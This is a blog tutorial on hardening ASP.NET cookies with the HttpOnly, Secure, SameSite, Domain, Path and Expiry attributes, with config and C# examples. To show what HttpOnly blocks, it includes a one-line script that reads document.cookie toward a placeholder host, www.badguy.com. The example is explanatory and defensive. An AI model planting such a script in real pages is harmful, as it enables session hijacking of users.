Securing Your Cookies

What are cookies?

HTTP cookies are used by websites to store stateful information about your visit. Name, address, SessionID, browsing history all can be stored as a cookie in your web browser as key-value pairs. ?Most importantly, cookies can store your login token and other identifying information about your browsing session that you’d probably prefer to keep to yourself.

Cookies are set using the Set-Cookie HTTP Header in the response sent from a web server. The web browser then sends the appropriate cookies back to the server with each request. Most browsers accept cookies up to a size of 4096 bytes.

Why should you protect them?

Putting in the effort to properly secure your cookies can be done very easily making it a great idea when you factor in the added security it provides. Doing so can partially mitigate some of the most common web attacks.

How?

Securing your cookies is performed differently depending on the server-side platform you are using, but the basic theory behind it is is the same for all platforms. Certain attributes can be applied to a cookie in the HTTP header giving it different desirable properties. I will be demonstrating how to do so using asp.net.

HTTPOnly– This attribute prevents the cookie from being accessible from client side scripts (javascript or vbscript). This is desirable in order to prevent cross site scripting attacks. It stops a malicious script from sending the cookie to a 3rd party. ?Here is an example using javascript:

<SCRIPT type="text/javascript">
var badGuy = 'www.badguy.com?=' + escape(document.cookie);
</SCRIPT>

Secure– This attribute ensures that the cookie can only be transmitted over an encrypted (HTTPS) connection. This would prevent a malicious user performing a Man in the Middle attack. Allowing them to steal your SessionID or session information.

If you want to globally turn on these attributes for all the cookies in your asp.net application, the easiest way to do so is by adding the following lines to the asp.net web.config file.

<system.web>
    <httpcookies httponlycookies="true" requiressl="true" />
 </system.web>

SameSite– Recently Google Chrome introduced this new type of cookie that is aimed at preventing Cross Site Request Forgery attacks. It prevents the specified cookie from behaving as a 3rd party cookie, preventing an attacker from sending a modified cookie to you domain, which is a key part of a CSRF attack. The same site attribute can either be set to ‘strict’ or ‘lax’.

Domain– For this attribute you can specify if you want the cookie to be sent from only one domain as well as its sub-domains. Using the value “www.brendanmiller.net” will send the cookie only from the exact domain www.brendanmiller.net. Using “.brendanmiller.net” will send the cookie to all associated sub-domains as well. Depending on your setup, this may not be an issue but you may want to restrict your cookie to only the appropriate sub-domains. This can be set by modifying the Domain property of your cookie in your C# code:

brendansCookie.Domain = "www.brendanmiller.net";

Path– The path attribute specifies which paths to send the cookie to. Usually set to “/” this send the cookie to all paths within the domain, while using “/wiki/” would only send the cookie to files matching that route. This can be set by modifying the Path property of your cookie as follows:

brendansCookie.Path = "/App1";

Expiry– One more thing to consider is the persistence of the cookie. Cookies have an Expiry property that determines how long they last. If you want a cookie to only last for the duration of a session then leave the Expiry property blank. Otherwise set the property to a specific date and time. Keeping the expiry period as short as possible is a good security practice.

Here is an example using C# of how to create a cookie and set it’s key properties:

HttpCookie myCookie = new HttpCookie("MyCookie");
myCookie.Value = otherStringValue;
myCookie.Expires = DateTime.Now.AddDays(1);
myCookie.Path = "/App1";
myCookie.Domain = "www.brendanmiller.net";
Response.Cookies.Add(myCookie);

Comments

comments